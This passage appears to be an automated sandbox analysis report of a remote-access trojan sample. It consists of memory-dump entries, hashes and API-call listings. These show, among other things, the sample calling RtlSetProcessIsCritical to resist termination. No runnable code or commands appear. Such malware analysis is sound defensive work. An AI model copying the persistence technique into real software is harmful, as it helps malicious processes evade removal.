                                                              • Instruction ID: edd18aeacde6a6f0af0b0c7332094d273a71c6d4bbd98e5f2e0d7097b861e49e
                                                              • Opcode Fuzzy Hash: 302f7109c5f9fb98198f6a8d1b9863b17e0c878d6ea97fe1cba6634e02c3bf33
                                                              • Instruction Fuzzy Hash: 33F090699001086ADF04BA548E07CDA77AAEB9A344B40B025FE1DBB151EE71EE5687A0
                                                              APIs
                                                              • SetWindowLongW.USER32(?,000000EB,?), ref: 00E8F2AD
                                                              • GetWindowLongW.USER32(?,000000EB), ref: 00E8F2BA
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: LongWindow
                                                              • String ID: f2
                                                              • API String ID: 1378638983-4265717505
                                                              • Opcode ID: e77db8538f9ac261d96639fbdf61affa9588b1b19183d0c569aae926ce4e388a
                                                              • Instruction ID: 925ee783b4674ec1421db9473a50fe893ab541c578836321d352997ef49de8de
                                                              • Opcode Fuzzy Hash: e77db8538f9ac261d96639fbdf61affa9588b1b19183d0c569aae926ce4e388a
                                                              • Instruction Fuzzy Hash: 7FF01C3600410DBFCF016F69DC58C9E3F65FB99321B008525F91A69171D732D920EF50
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(00000000,?,00E840B5,?), ref: 00E84903
                                                              • FindResourceW.KERNEL32(00000000,RTL,00000005,?,00E840B5,?), ref: 00E84911
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FindHandleModuleResource
                                                              • String ID: RTL
                                                              • API String ID: 3537982541-834975271
                                                              • Opcode ID: 954ed53ad941b6cd637c7b05f5d9f807e2e826d90d2f679ff917191614b28135
                                                              • Instruction ID: 307e5e0c3415089a6db3a74b660f08c296ef24690524bb31c55fdca94372252f
                                                              • Opcode Fuzzy Hash: 954ed53ad941b6cd637c7b05f5d9f807e2e826d90d2f679ff917191614b28135
                                                              • Instruction Fuzzy Hash: 56C012716443119EF63027326D4DB833D445B46B11F050494B145BA1D0DEE5E448C760

                                                              Execution Graph

                                                              Execution Coverage:30.8%
                                                              Dynamic/Decrypted Code Coverage:100%
                                                              Signature Coverage:0%
                                                              Total number of Nodes:3
                                                              Total number of Limit Nodes:0
                                                              execution_graph: 23f2810 -> 23f2818 (RtlSetProcessIsCritical) -> 23f288c

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph: 23f2810-23f2853 -> 23f285b-23f288a (RtlSetProcessIsCritical); 23f285b-23f288a -> 23f288c; 23f285b-23f288a -> 23f2891-23f28aa; 23f288c -> 23f2891-23f28aa
                                                              APIs
                                                              • RtlSetProcessIsCritical.NTDLL(?,?,?), ref: 023F287D
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2088975855.00000000023F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_23f0000_rrat.jbxd
                                                              Similarity
                                                              • API ID: CriticalProcess
                                                              • String ID:
                                                              • API String ID: 2695349919-0
                                                              • Opcode ID: 7549e5bd995e968300265f7547af890d98d2283f4ffe41fca360826b183aa1e4
                                                              • Instruction ID: 236239a504a254de5a3b1c39aec55b0bad1277ae097d2fc26843ba2afd9ff20f
                                                              • Opcode Fuzzy Hash: 7549e5bd995e968300265f7547af890d98d2283f4ffe41fca360826b183aa1e4
                                                              • Instruction Fuzzy Hash: 121110B58046488FCB20DF9AD484BDEBFF4FF88310F208059D958A3250C775A944CFA1

                                                              Control-flow Graph

                                                              [Control-flow graph rendered as an image in the original; legend: Executed / Not Executed. Basic blocks 23f2818-23f288a (call to RtlSetProcessIsCritical), 23f288c, 23f2891-23f28aa.]
                                                              APIs
                                                              • RtlSetProcessIsCritical.NTDLL(?,?,?), ref: 023F287D
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2088975855.00000000023F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_23f0000_rrat.jbxd
                                                              Similarity
                                                              • API ID: CriticalProcess
                                                              • String ID:
                                                              • API String ID: 2695349919-0
                                                              • Opcode ID: 6cf7a827d317b0753bd73813e326d42821fef1ad9c6ab11cc4d76442d4514e83
                                                              • Instruction ID: 4faa352ed643164d003aadaf6dc4fc8016f61002088ca51feee09b37bb615921
                                                              • Opcode Fuzzy Hash: 6cf7a827d317b0753bd73813e326d42821fef1ad9c6ab11cc4d76442d4514e83
                                                              • Instruction Fuzzy Hash: 7B11F2B59006498FCB20DF9AD584BDEBFF4FF48310F208019D918A7250C775A944CFA5

                                                              Control-flow Graph

                                                              [Control-flow graph rendered as an image in the original; legend: Executed / Not Executed. Basic blocks b0d6dc-b0d7ba, no API calls.]
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2088650289.0000000000B0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B0D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_b0d000_rrat.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 54990c8ede3a1549952c96428e060d4b7590c80cc2edcaa375e21e51c4686a54
                                                              • Instruction ID: 17a79a5c2bb1f09caa5272083c65e7c701cbbf403892e8a4696badd4b616ef46
                                                              • Opcode Fuzzy Hash: 54990c8ede3a1549952c96428e060d4b7590c80cc2edcaa375e21e51c4686a54
                                                              • Instruction Fuzzy Hash: ED210375544204DFCB05DF94D9C0B26BFA6FB98324F2085A9E9090B2D6C33ADC56DAA2
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2088650289.0000000000B0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B0D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_b0d000_rrat.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                              • Instruction ID: ccd752d7f1d72f1a4bbfe510032b176565f24165ec6b85064e578dbac111f918
                                                              • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                              • Instruction Fuzzy Hash: 6A11D376504244CFCB06CF54D5C4B16BFB2FB94324F24C6E9D9490B296C336D85ACBA2
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2088650289.0000000000B0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B0D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_b0d000_rrat.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 030d6c1437843e1a272d4f8bfb39c89efaf9b2e716ce86538b8a6e467221e319
                                                              • Instruction ID: 7b8f1bcf6cc0aaa725bd3e336d504439eae914cbfee6558e1d0ad890e6cd3c4f
                                                              • Opcode Fuzzy Hash: 030d6c1437843e1a272d4f8bfb39c89efaf9b2e716ce86538b8a6e467221e319
                                                              • Instruction Fuzzy Hash: 800129714093849ED7128A258894652BFA8EF53224F1984DBE9888F2E7D2695C45CB72
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2088650289.0000000000B0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B0D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_b0d000_rrat.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 20965fda425a177c3f374a2475898522aa6f6aa910e4bbebfef0d641a8ac6564
                                                              • Instruction ID: 6c5179536dfda029d612fed15d423d112eb6bea01f41661ea3ba58387503e4e2
                                                              • Opcode Fuzzy Hash: 20965fda425a177c3f374a2475898522aa6f6aa910e4bbebfef0d641a8ac6564
                                                              • Instruction Fuzzy Hash: 5D012B715053049EE7208E55CCC4B67BFDCEF45320F18C4A9ED4D0B2C6D2799801CAB5

                                                              Execution Graph

                                                              Execution Coverage:21.7%
                                                              Dynamic/Decrypted Code Coverage:100%
                                                              Signature Coverage:0%
                                                              Total number of Nodes:3
                                                              Total number of Limit Nodes:0
                                                              [Execution graph rendered as an image in the original: 29727d8 -> 297281b (call to RtlSetProcessIsCritical) -> 297284c.]

                                                              Control-flow Graph

                                                              [Control-flow graph rendered as an image in the original; legend: Executed / Not Executed. Basic blocks 29727d0-2972813, 297281b-297284a (call to RtlSetProcessIsCritical), 297284c, 2972851-297286a.]
                                                              APIs
                                                              • RtlSetProcessIsCritical.NTDLL(?,?,?), ref: 0297283D
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.4490742809.0000000002970000.00000040.00000800.00020000.00000000.sdmp, Offset: 02970000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_2970000_Explorer.jbxd
                                                              Similarity
                                                              • API ID: CriticalProcess
                                                              • String ID:
                                                              • API String ID: 2695349919-0
                                                              • Opcode ID: 797077d2f12add35d58628b25a5f76175591669afc6397e8f08f007fcbba0f4f
                                                              • Instruction ID: 24ba2063420f745d20350d0bc00a8c47fd76f09995740c99a4b94dbc9b0ff4ab
                                                              • Opcode Fuzzy Hash: 797077d2f12add35d58628b25a5f76175591669afc6397e8f08f007fcbba0f4f
                                                              • Instruction Fuzzy Hash: A41113B58042488FCB20DF9AC584ADEBFF4EB49310F208059D959A3251C779A545CFA1

                                                              Control-flow Graph

                                                              [Control-flow graph rendered as an image in the original; legend: Executed / Not Executed. Basic blocks 29727d8-297284a (call to RtlSetProcessIsCritical), 297284c, 2972851-297286a.]
                                                              APIs
                                                              • RtlSetProcessIsCritical.NTDLL(?,?,?), ref: 0297283D
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.4490742809.0000000002970000.00000040.00000800.00020000.00000000.sdmp, Offset: 02970000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_2970000_Explorer.jbxd
                                                              Similarity
                                                              • API ID: CriticalProcess
                                                              • String ID:
                                                              • API String ID: 2695349919-0
                                                              • Opcode ID: ca5542bacb50893857a3751f71c753d30b139a5e45f50c47d21d0275f7d975bd
                                                              • Instruction ID: 48136df54e1bc4bd045fd016483ea5fe40b9de85e8c45f86979631af048177c2
                                                              • Opcode Fuzzy Hash: ca5542bacb50893857a3751f71c753d30b139a5e45f50c47d21d0275f7d975bd
                                                              • Instruction Fuzzy Hash: 9911F2B59006488FCB20DF9AC984ADEBFF4FB49310F208059D919A7250C779A944CFA5
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.4489944551.0000000000D9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D9D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_d9d000_Explorer.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: be0d72698c0c1d6b6eea3ff4bea80969234f43e4d8d9355a133314e8812afd2e
                                                              • Instruction ID: 0b764c7a440b8e6909a37c7b6edc01cbd425f6ddbda23106a888c744b737ae28
                                                              • Opcode Fuzzy Hash: be0d72698c0c1d6b6eea3ff4bea80969234f43e4d8d9355a133314e8812afd2e
                                                              • Instruction Fuzzy Hash: 1321F272544304AFDF04DF24D980B26BB66FB94314F24C569D8495B396C33AD806CAB1
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.4489944551.0000000000D9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D9D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_d9d000_Explorer.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                              • Instruction ID: 0e92b01b1e2af85dbbdf16db929d61cd6b5735df0a832307635ae8b1fa4317c2
                                                              • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                              • Instruction Fuzzy Hash: 1C119D76504380DFDB06CF14D9C4B15BFB2FB84314F28C6A9D8494B656C33AD84ACBA2
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.4489886972.0000000000D8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D8D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_d8d000_Explorer.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1d344334ac410e7d53e0edeae1e89e3a4e9ffe444a99a32c2aac6d8b4cb48a1f
                                                              • Instruction ID: 3db04774943580aa21905b10b6fc5dd4459e3d3c794eb2e2174acf6085fd17c3
                                                              • Opcode Fuzzy Hash: 1d344334ac410e7d53e0edeae1e89e3a4e9ffe444a99a32c2aac6d8b4cb48a1f
                                                              • Instruction Fuzzy Hash: 30012B714043449AE720AE16CC84B67BF9DEF45324F2CC429ED480B2C6C279D801C7B1
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.4489886972.0000000000D8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D8D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_d8d000_Explorer.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7d53a5e49a84475224af192840f3e95caa773adde611cd7f0b98abafd31cfba5
                                                              • Instruction ID: a0ccbfd6f20548d222b7c8d2da431960d4f3575e9bcbece321329aa8acca2821
                                                              • Opcode Fuzzy Hash: 7d53a5e49a84475224af192840f3e95caa773adde611cd7f0b98abafd31cfba5
                                                              • Instruction Fuzzy Hash: F4014C6140E3C09ED7128B258C94A52BFB4EF57224F1D80DBD9888F2E7C2695849C772
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2159099076.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_3400000_Explorer.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (aq$Te]q$d6p
                                                              • API String ID: 0-967301506
                                                              • Opcode ID: 044dcd8865099a46a52d3ccf246c0a2ae2caa17b599604ef2bd75860ac767c91
                                                              • Instruction ID: 360a0dfff25d83cef1083d3e7f58ecd1c71ad3ba571b0c37752d16bb2b5d2f89
                                                              • Opcode Fuzzy Hash: 044dcd8865099a46a52d3ccf246c0a2ae2caa17b599604ef2bd75860ac767c91
                                                              • Instruction Fuzzy Hash: B3515D39B101149FC744DF69C498B9EBBF6FF88710F2580AAE406EB3A5CA75DC018B95
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2159099076.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_3400000_Explorer.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Haq$dLcq
                                                              • API String ID: 0-1713614415
                                                              • Opcode ID: 392f36e872d4c6ac5042821e397c628d664f7aa5fb17484d645adbbd6e2c83c9
                                                              • Instruction ID: b536fc5084f39bf8b9c27bcf37602b525749ad7b379fb4968baf3c83c830c28e
                                                              • Opcode Fuzzy Hash: 392f36e872d4c6ac5042821e397c628d664f7aa5fb17484d645adbbd6e2c83c9
                                                              • Instruction Fuzzy Hash: FE41B1307042049FCB05DF69D498B9EBBF6EF89300F1484AAE405DB3A5CA74DC05CB91
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2159099076.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_3400000_Explorer.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: LR]q
                                                              • API String ID: 0-3081347316
                                                              • Opcode ID: ccad9abb12609a54e02c121b3c09ff64acc143b53ab390f3ff937e2b6f8f6476
                                                              • Instruction ID: dfdf273f3b3f0c68ea1d00348b16f29b41f4874bda64f7a4dd42541c4504e2a7
                                                              • Opcode Fuzzy Hash: ccad9abb12609a54e02c121b3c09ff64acc143b53ab390f3ff937e2b6f8f6476
                                                              • Instruction Fuzzy Hash: D031A034F002169FCB45EB79845566F7BF6FF89214B144079E009EB3A4DE34DC028B92
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2159099076.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_3400000_Explorer.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: LR]q
                                                              • API String ID: 0-3081347316
                                                              • Opcode ID: 67490948f10960e0d5fb41cfa740fa348d5da8f2b42047c61312e3b5f229c3c0
                                                              • Instruction ID: e92a3b773da1aed525f72c5ec33e485224b0a58ea3b59ffbb2d83e140106c678
                                                              • Opcode Fuzzy Hash: 67490948f10960e0d5fb41cfa740fa348d5da8f2b42047c61312e3b5f229c3c0
                                                              • Instruction Fuzzy Hash: 63312334F082468FC741DB78885466EBBF2EF85300B1844BAD04ADB3A5DA34DC02C796
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2159099076.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_3400000_Explorer.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: dLcq
                                                              • API String ID: 0-2236789282
                                                              • Opcode ID: 5c2c95c083c8288ef81795887f0655b49c1e57831bd5574bbf9a4299a9350611
                                                              • Instruction ID: a4aea3619fe30796a6c2e4d4df80eb7aca54c6b94649c53c59dafbe6ab61bc33
                                                              • Opcode Fuzzy Hash: 5c2c95c083c8288ef81795887f0655b49c1e57831bd5574bbf9a4299a9350611
                                                              • Instruction Fuzzy Hash: 92319C75A002059FCB14DF69C588BAEBBF6FF48300F18856AE445AB3A1CB75EC05CB90
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2159099076.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_3400000_Explorer.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Haq
                                                              • API String ID: 0-725504367
                                                              • Opcode ID: 69fecda24e21a3da0e96f53c3ddf34d7ebbaee3207282e8df6c4fb7c9847a85b
                                                              • Instruction ID: c23b25bfe76a92b6166499b0feaf347b4cd30d4b951859d41618d4be75f41263
                                                              • Opcode Fuzzy Hash: 69fecda24e21a3da0e96f53c3ddf34d7ebbaee3207282e8df6c4fb7c9847a85b
                                                              • Instruction Fuzzy Hash: 65F02B317082501FC3459B3DA89466E7BD7EFDA66076A84FEE109CB39ACD28CC038391
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2159099076.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_3400000_Explorer.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5195f5e9f31de51b522a36d95dd10d7988f17d8f7b32702b61abc5e4d8da98b5
                                                              • Instruction ID: feb450169ab81aa30880a5690df44fcce51359919180e1889cd61b27f36c3132
                                                              • Opcode Fuzzy Hash: 5195f5e9f31de51b522a36d95dd10d7988f17d8f7b32702b61abc5e4d8da98b5
                                                              • Instruction Fuzzy Hash: D8F08C70A0E3C8AFC702CF799964649BFB5AA47100B0540EFD849DB193E5351E05C792
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2159099076.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_3400000_Explorer.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1adce2dc4332750cf4b0275da472294bd65d62d23cb22d738fd0b69adb959255
                                                              • Instruction ID: b60c79d5a4ee59a5548a8aa3523b06fe9bbbe823a1d31c41398d69ddb8a6b771
                                                              • Opcode Fuzzy Hash: 1adce2dc4332750cf4b0275da472294bd65d62d23cb22d738fd0b69adb959255
                                                              • Instruction Fuzzy Hash: FD51E630601291CFD715EF24F594959777BFF84305320866DD8068B368DB79AD4ACF82
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2159099076.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: false
                                                              • Source File: 00000018.00000002.2215654821.00000000011FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011FD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_24_2_11fd000_explore.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: dcb3e464843ff549f1b8052f112bfab193f5d339558210e726a05781d31d1be8
                                                              • Instruction ID: 617c861d34cc14c411a06caf473ad70bfdd88ef555767e59799737354d26cd08
                                                              • Opcode Fuzzy Hash: dcb3e464843ff549f1b8052f112bfab193f5d339558210e726a05781d31d1be8
                                                              • Instruction Fuzzy Hash: 95012B71004304DAEB288A59DC84B77BF9CEF463A0F18C52EEE480B286C3799801C6B1
                                                              Memory Dump Source
                                                              • Source File: 00000018.00000002.2215654821.00000000011FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011FD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_24_2_11fd000_explore.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4e24ac6e146b0f544af505659fb3a10667e60fc22496914646b723b9a1872550
                                                              • Instruction ID: a04858b9a4b0e519c4efef26b1ef3dea57b8105e605f1b37b0d0708036ba4ecb
                                                              • Opcode Fuzzy Hash: 4e24ac6e146b0f544af505659fb3a10667e60fc22496914646b723b9a1872550
                                                              • Instruction Fuzzy Hash: 72015E7100E3C09FE7178B259894B62BFB4EF53224F19C1DBD9888F2A7C2695848C772
                                                              Memory Dump Source
                                                              • Source File: 00000018.00000002.2220785224.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_24_2_1520000_explore.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2a8179a9b01dd57a830e46210f781bdc8c58c80d2935ad539cbcf66b3dc49732
                                                              • Instruction ID: 6344ad98a9b6797f319b975a16b6f6f91d36fab56483a106553a737370be899f
                                                              • Opcode Fuzzy Hash: 2a8179a9b01dd57a830e46210f781bdc8c58c80d2935ad539cbcf66b3dc49732
                                                              • Instruction Fuzzy Hash: F3014C71911314CFC718EF69E50856DBBB1FB01304B9085B8E80AEF2C1EB799D01DB91
                                                              Memory Dump Source
                                                              • Source File: 00000018.00000002.2220785224.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_24_2_1520000_explore.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a0bc9c82959b5604d800523a4d341209ed79c08a4d2a47c6613644c196975880
                                                              • Instruction ID: 1431ea3431754e11085fd5ceb5c800f79b30bcb07744ad642a52939c3fe76e0c
                                                              • Opcode Fuzzy Hash: a0bc9c82959b5604d800523a4d341209ed79c08a4d2a47c6613644c196975880
                                                              • Instruction Fuzzy Hash: B1018B71D11314DFCB54EFA9E5081ADBBB1FF51304B8085ADE449EB281E7759902CB91
                                                              Memory Dump Source
                                                              • Source File: 00000018.00000002.2220785224.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_24_2_1520000_explore.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e2a054f8e7cc0ddf1b75c05252dbedc1f17b45808ddb42bfc79e459708c7f0c9
                                                              • Instruction ID: bbcb6811d1a2ed3e84159a403afdde6be08684d413a9bf1f638469e2b4563861
                                                              • Opcode Fuzzy Hash: e2a054f8e7cc0ddf1b75c05252dbedc1f17b45808ddb42bfc79e459708c7f0c9
                                                              • Instruction Fuzzy Hash: 51E02671A06208AFC706EF70D9002493BBADB45604F0101F98408DB292D6388E098B82
                                                              Memory Dump Source
                                                              • Source File: 00000018.00000002.2220785224.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_24_2_1520000_explore.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b31bd434c7b6a45c7b74c27c001ebc9e690218a556d220025630700123354b21
                                                              • Instruction ID: 916ff0e326df6cfdc7de24bb2e6443f06c5d61e4f30373dd5f675011176fd88a
                                                              • Opcode Fuzzy Hash: b31bd434c7b6a45c7b74c27c001ebc9e690218a556d220025630700123354b21
                                                              • Instruction Fuzzy Hash: E0D05E71A4020DEFC748EFA5ED01A5EB7BEEB44600F1041B8880CDB350EB395E158B92
                                                              Memory Dump Source
                                                              • Source File: 00000018.00000002.2220785224.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_24_2_1520000_explore.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b5618eb488a41e7af2b630c1ce2aaf722f8508eb2607457779c5b03091d569fb
                                                              • Instruction ID: 74c294b4ffcac6b3a0a9c31a56fd34d32574937526cdeb87d413c68161ee556e
                                                              • Opcode Fuzzy Hash: b5618eb488a41e7af2b630c1ce2aaf722f8508eb2607457779c5b03091d569fb
                                                              • Instruction Fuzzy Hash: 6DD01771A10208EF8B04EFA8E90495DBBBAEB44204B1082ADD908E7241EA316F149B91
                                                              Memory Dump Source
                                                              • Source File: 00000018.00000002.2220785224.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_24_2_1520000_explore.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 73f5bba0994109c9c74a21709685736bdcba640d2f278a4c49bfe22ddfec158a
                                                              • Instruction ID: 2135e8ebfa76170a716830aade68b917fa667a0eb0d4d872c54206f2719d6115
                                                              • Opcode Fuzzy Hash: 73f5bba0994109c9c74a21709685736bdcba640d2f278a4c49bfe22ddfec158a
                                                              • Instruction Fuzzy Hash: 87C08CB142F3D05FCF03833139380403F748D1712930909CAC080CE0F3C059084ACB26